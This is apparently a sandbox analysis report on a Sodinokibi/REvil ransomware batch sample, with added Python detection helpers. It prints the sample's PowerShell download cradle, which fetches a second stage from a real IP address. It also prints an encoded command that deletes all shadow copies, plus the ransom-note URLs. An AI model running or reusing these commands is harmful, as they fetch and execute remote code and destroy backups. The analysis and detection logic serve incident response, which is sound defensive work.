Analysis
Max time kernel: 149s
Max time network: 152s
Platform: windows10_x64
Resource: win10
Submitted: 14-08-2020 13:10
Static task: static1
Behavioral task: behavioral1 (sample 02e935713bd82b8d92596478da846147.bat, resource win7)
Behavioral task: behavioral2 (sample 02e935713bd82b8d92596478da846147.bat, resource win10)
The signatures and process tree on this page are from the win10 run.
General
Target: 02e935713bd82b8d92596478da846147.bat
Size: 222B
MD5: 709373b57a3c4758065b1f72f1a19b2d
SHA1: b820438ee7bcc43e84373b68f9fec3bedc10c25a
SHA256: ab2207ca32e7d0e2434060e8a2d6cb8bf247c9d3174fe86c5c06fb0100c31838
SHA512: d5061ac40ed9258dcb412dcf5eb05fe716affcd44a388b81b9b89e29317f51138fc8e7a13d1f195a5d3647736aea67c66a1d73fb4cff70406851cd2c29f1816f
Malware Config
Extracted: http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147 (second-stage script URL fetched by powershell.exe, PID 3052; see Processes)
Extracted from C:\69j456788-readme.txt (the dropped ransom note):
  Family: sodinokibi
  URLs in the note:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A3AEEB525E171025
    http://decryptor.cc/A3AEEB525E171025
Signatures

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Blacklisted process makes network request (62 IoCs)
Process powershell.exe (PID 3052), network flows: 3, 5, 16, 19, 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, 40, 42, 44, 48, 50, 51, 52, 55, 57, 59, 61, 63, 65, 67, 69, 71, 73, 76, 78, 80, 82, 84, 86, 88, 90, 91, 93, 95, 97, 99, 101, 103, 105, 107, 109, 111, 113, 115, 117, 119, 121, 123, 125, 127, 129, 131, 133, 135
Modifies extensions of user files (9 IoCs)
Ransomware generally changes the extension on encrypted files. Every rename below appends the same suffix, .69j456788, which is also the prefix of the ransom note name 69j456788-readme.txt.
Process powershell.exe:
  File renamed: C:\Users\Admin\Pictures\DismountResume.crw => \??\c:\users\admin\pictures\DismountResume.crw.69j456788
  File renamed: C:\Users\Admin\Pictures\SuspendRename.png => \??\c:\users\admin\pictures\SuspendRename.png.69j456788
  File renamed: C:\Users\Admin\Pictures\UnblockLimit.tiff => \??\c:\users\admin\pictures\UnblockLimit.tiff.69j456788
  File renamed: C:\Users\Admin\Pictures\SwitchConnect.tiff => \??\c:\users\admin\pictures\SwitchConnect.tiff.69j456788
  File opened for modification: \??\c:\users\admin\pictures\UnblockLimit.tiff
  File renamed: C:\Users\Admin\Pictures\CheckpointUnblock.tif => \??\c:\users\admin\pictures\CheckpointUnblock.tif.69j456788
  File renamed: C:\Users\Admin\Pictures\ConfirmRegister.png => \??\c:\users\admin\pictures\ConfirmRegister.png.69j456788
  File opened for modification: \??\c:\users\admin\pictures\SwitchConnect.tiff
  File renamed: C:\Users\Admin\Pictures\InitializeSkip.tif => \??\c:\users\admin\pictures\InitializeSkip.tif.69j456788
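REvil picks a fresh extension for each victim, so the value has to be read out of the run rather than looked up. The following Python helper is an added example, not part of the sandbox report: it takes the rename events above (re-entered as constructed source/destination pairs), derives the appended suffix, requires a minimum burst of renames before calling it a ransomware extension, and checks the note name against the REvil convention of <extension>-readme.txt. The threshold and the function names are this example's own choices.

```python
from collections import Counter
from pathlib import PureWindowsPath

# Rename events constructed from the "File renamed" IoCs in this report as
# (source path, destination path). The two "opened for modification" entries
# have no destination and are left out.
RENAME_EVENTS = [
    (r"C:\Users\Admin\Pictures\DismountResume.crw",
     r"\??\c:\users\admin\pictures\DismountResume.crw.69j456788"),
    (r"C:\Users\Admin\Pictures\SuspendRename.png",
     r"\??\c:\users\admin\pictures\SuspendRename.png.69j456788"),
    (r"C:\Users\Admin\Pictures\UnblockLimit.tiff",
     r"\??\c:\users\admin\pictures\UnblockLimit.tiff.69j456788"),
    (r"C:\Users\Admin\Pictures\SwitchConnect.tiff",
     r"\??\c:\users\admin\pictures\SwitchConnect.tiff.69j456788"),
    (r"C:\Users\Admin\Pictures\CheckpointUnblock.tif",
     r"\??\c:\users\admin\pictures\CheckpointUnblock.tif.69j456788"),
    (r"C:\Users\Admin\Pictures\ConfirmRegister.png",
     r"\??\c:\users\admin\pictures\ConfirmRegister.png.69j456788"),
    (r"C:\Users\Admin\Pictures\InitializeSkip.tif",
     r"\??\c:\users\admin\pictures\InitializeSkip.tif.69j456788"),
]
RANSOM_NOTE = r"C:\69j456788-readme.txt"  # from the Malware Config section

NT_PREFIX = "\\??\\"  # NT object-manager form the sandbox logs for destinations


def normalize(path: str) -> str:
    """Drop the \\??\\ prefix and lowercase so Win32 and NT paths compare equal."""
    if path.startswith(NT_PREFIX):
        path = path[len(NT_PREFIX):]
    return path.lower()


def appended_suffix(src: str, dst: str):
    """Return what the rename appended to the file name, or None if dst is not
    simply src plus a suffix (a move or an in-place rewrite is not an extension change)."""
    s, d = normalize(src), normalize(dst)
    if d.startswith(s) and len(d) > len(s):
        return d[len(s):]
    return None


def ransomware_suffix(events, min_renames: int = 5):
    """Most common appended suffix across the rename events, reported only when
    at least min_renames files received it. A single rename is noise; a burst of
    renames that all append one previously unseen suffix is the signal this
    signature keys on. min_renames is an assumed threshold for this example."""
    suffixes = [appended_suffix(src, dst) for src, dst in events]
    counts = Counter(sfx for sfx in suffixes if sfx)
    if not counts:
        return None
    suffix, n = counts.most_common(1)[0]
    return suffix if n >= min_renames else None


def note_matches_suffix(note_path: str, suffix: str) -> bool:
    """REvil names its note <id>-readme.txt using the same id as the file suffix;
    a match ties the note and the renames to one infection."""
    name = PureWindowsPath(note_path).name.lower()
    return name == f"{suffix.lstrip('.').lower()}-readme.txt"


if __name__ == "__main__":
    ext = ransomware_suffix(RENAME_EVENTS)
    print("appended extension:", ext)
    print("note matches:", note_matches_suffix(RANSOM_NOTE, ext))
```

The derived extension is what goes into a file-system hunt (any file ending in .69j456788 on other hosts) and the note check is a cheap sanity test that the renames and the config extraction describe the same run.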
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
Process vssvc.exe:
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
These are the Volume Shadow Copy service's own writer diagnostic keys, written when the service starts; vssvc.exe starting during this run is consistent with it servicing the shadow-copy deletion issued by PID 3184 (see Processes).
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Process powershell.exe:
  Set value (str): \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\z9e8e97kvto.bmp"
Drops file in Program Files directory (35 IoCs)
Process powershell.exe:
  File opened for modification: \??\c:\program files\TestFind.bmp
  File opened for modification: \??\c:\program files\ReadMove.pdf
  File opened for modification: \??\c:\program files\ReceiveDismount.avi
  File opened for modification: \??\c:\program files\SyncConvertTo.xhtml
  File opened for modification: \??\c:\program files\InstallSend.mp3
  File opened for modification: \??\c:\program files\CompleteInitialize.mht
  File opened for modification: \??\c:\program files\PushImport.M2TS
  File opened for modification: \??\c:\program files\ReceiveDeny.emz
  File created: \??\c:\program files (x86)\69j456788-readme.txt
  File opened for modification: \??\c:\program files\GroupGet.scf
  File opened for modification: \??\c:\program files\InitializeCompress.png
  File opened for modification: \??\c:\program files\CopyUnprotect.scf
  File opened for modification: \??\c:\program files\RevokeExpand.xsl
  File opened for modification: \??\c:\program files\SendSet.WTV
  File opened for modification: \??\c:\program files\SkipExpand.vssx
  File opened for modification: \??\c:\program files\SuspendCompress.AAC
  File opened for modification: \??\c:\program files\UnprotectReceive.potm
  File opened for modification: \??\c:\program files\InitializeStep.xsl
  File opened for modification: \??\c:\program files\LimitGroup.ex_
  File opened for modification: \??\c:\program files\SearchCompress.DVR-MS
  File opened for modification: \??\c:\program files\UnpublishClose.wps
  File opened for modification: \??\c:\program files\EnableDebug.3gp
  File opened for modification: \??\c:\program files\DenyWatch.shtml
  File opened for modification: \??\c:\program files\DisconnectConvertTo.png
  File opened for modification: \??\c:\program files\ExpandConfirm.ex_
  File opened for modification: \??\c:\program files\FormatSkip.ini
  File opened for modification: \??\c:\program files\ImportOut.zip
  File opened for modification: \??\c:\program files\NewSplit.mov
  File opened for modification: \??\c:\program files\PopRedo.m4v
  File created: \??\c:\program files\69j456788-readme.txt
  File opened for modification: \??\c:\program files\AssertPush.xps
  File opened for modification: \??\c:\program files\BlockLimit.ADTS
  File opened for modification: \??\c:\program files\CompressAssert.mhtml
  File opened for modification: \??\c:\program files\SplitResize.xml
  File opened for modification: \??\c:\program files\AddNew.001
Suspicious behavior: EnumeratesProcesses (8 IoCs)
  PID 3052 powershell.exe (5 events)
  PID 3184 powershell.exe (3 events)
Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Token: SeDebugPrivilege, PID 3052 powershell.exe
  Token: SeDebugPrivilege, PID 3052 powershell.exe
  Token: SeDebugPrivilege, PID 3184 powershell.exe
  Token: SeBackupPrivilege, PID 1144 vssvc.exe
  Token: SeRestorePrivilege, PID 1144 vssvc.exe
  Token: SeAuditPrivilege, PID 1144 vssvc.exe
  Token: SeTakeOwnershipPrivilege, PID 3052 powershell.exe
SeTakeOwnershipPrivilege in the encrypting process (PID 3052) is the one to note: it lets the encryptor take ownership of files its token cannot otherwise open. The backup, restore and audit privileges on vssvc.exe are what the VSS service normally enables for itself.
Suspicious use of WriteProcessMemory (6 IoCs)
  PID 1908 cmd.exe wrote to memory of PID 3052 powershell.exe (3 events)
  PID 3052 powershell.exe wrote to memory of PID 3184 powershell.exe (3 events)
Both pairs are parent writing into its own child at process creation, matching the tree below; there is no write into an unrelated process that would indicate injection.
Processes

C:\Windows\system32\cmd.exe (PID 1908)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\02e935713bd82b8d92596478da846147.bat"
  Signatures: Suspicious use of WriteProcessMemory
  |
  +-- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3052)
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147');Invoke-WIWBLXHVRXNAAOB;Start-Sleep -s 10000"
      Signatures: Blacklisted process makes network request; Modifies extensions of user files; Sets desktop wallpaper using registry; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      |
      +-- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3184)
          Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
          Decoded -e payload (base64 over UTF-16LE text): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
          Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (PID 1144)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures: Modifies service; Suspicious use of AdjustPrivilegeToken

Reading the tree: the 222-byte .bat does nothing but launch 32-bit PowerShell (SysWOW64 on an x64 host) with a one-line download cradle. PID 3052 pulls the second stage from the paste URL straight into memory with IEX and calls Invoke-WIWBLXHVRXNAAOB; every encryption artifact in the signatures (renames to .69j456788, the 69j456788-readme.txt notes, the wallpaper change) is attributed to this powershell.exe, and the report shows no separately dropped encryptor. Its child, PID 3184, exists only to delete every shadow copy through WMI, and vssvc.exe (PID 1144) starting alongside with its VSS writer keys is consistent with servicing that request. The trailing Start-Sleep -s 10000 keeps PID 3052 alive long after the work is done.
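The chain above (cmd.exe running a .bat, an IEX DownloadString cradle, a second PowerShell with an encoded command that deletes shadow copies) is what a responder should be able to pull out of process-creation telemetry without a sandbox. The following Python is an added example, not code from the report or from the sample: it replays the tree as constructed process-creation events, decodes the -e payload the way PowerShell does (base64 over UTF-16LE), and runs a handful of detections over the effective script of each process. The event shape, the rule names and the -e/-ec/-enc prefix regex are this example's own assumptions.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the Processes tree in this report: same PIDs, images and
# command lines. ppid 0 means the report shows no parent.
EVENTS = [
    ProcEvent(1908, 0, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\02e935713bd82b8d92596478da846147.bat"'),
    ProcEvent(3052, 1908, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147');Invoke-WIWBLXHVRXNAAOB;Start-Sleep -s 10000"'''),
    ProcEvent(3184, 3052, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="),
    ProcEvent(1144, 0, r"C:\Windows\system32\vssvc.exe", r"C:\Windows\system32\vssvc.exe"),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; this regex covers
# the three spellings seen in the wild (-e, -ec, -enc) plus the full switch and is
# an assumption of this example. "-ep bypass" does not match because no whitespace
# follows the "-e".
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
IEX_RE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|Invoke-RestMethod", re.I)
SHADOW_RE = re.compile(
    r"Win32_Shadowcopy.*?\.Delete\(|vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete",
    re.I | re.S)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind powershell -e: the argument is base64 of UTF-16LE text."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le").rstrip("\x00")
    except (ValueError, UnicodeDecodeError):  # not base64, or an odd byte count
        return None


def effective_script(ev: ProcEvent) -> str:
    """What PowerShell will actually execute: the decoded payload if -e was used, else the raw command line."""
    return decode_encoded_command(ev.cmdline) or ev.cmdline


def triage(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Run the detections over every event; returns pid -> list of finding names."""
    by_pid = {ev.pid: ev for ev in events}
    findings: Dict[int, List[str]] = {ev.pid: [] for ev in events}
    for ev in events:
        script = effective_script(ev)
        is_ps = ev.image.lower().endswith("powershell.exe")
        parent = by_pid.get(ev.ppid)
        if is_ps and IEX_RE.search(script) and DOWNLOAD_RE.search(script):
            findings[ev.pid].append("download_cradle")      # fetch-and-IEX in one line
        if SHADOW_RE.search(script):
            findings[ev.pid].append("shadow_copy_deletion")  # WMI, vssadmin or wmic variants
        if is_ps and decode_encoded_command(ev.cmdline) is not None:
            findings[ev.pid].append("encoded_command")
        if is_ps and parent and parent.image.lower().endswith("cmd.exe") \
                and re.search(r"\.bat\b", parent.cmdline, re.I):
            findings[ev.pid].append("bat_launched_powershell")
        if is_ps and parent and parent.image.lower().endswith("powershell.exe"):
            findings[ev.pid].append("powershell_spawned_powershell")
    return findings


def network_iocs(events: List[ProcEvent]) -> List[str]:
    """URLs embedded in any process's effective script; the stage-2 fetch shows up here."""
    urls = set()
    for ev in events:
        urls.update(URL_RE.findall(effective_script(ev)))
    return sorted(urls)


if __name__ == "__main__":
    for pid, names in triage(EVENTS).items():
        print(pid, names)
    print("decoded:", decode_encoded_command(EVENTS[2].cmdline))
    print("urls:", network_iocs(EVENTS))
```

Decoding before matching matters: the shadow-copy rule fires on PID 3184 only because the -e argument is turned back into text first; a rule that only looks at the raw command line sees an opaque base64 blob. Running the rules over the effective script also makes the same logic apply whether the attacker passed the command in clear or encoded.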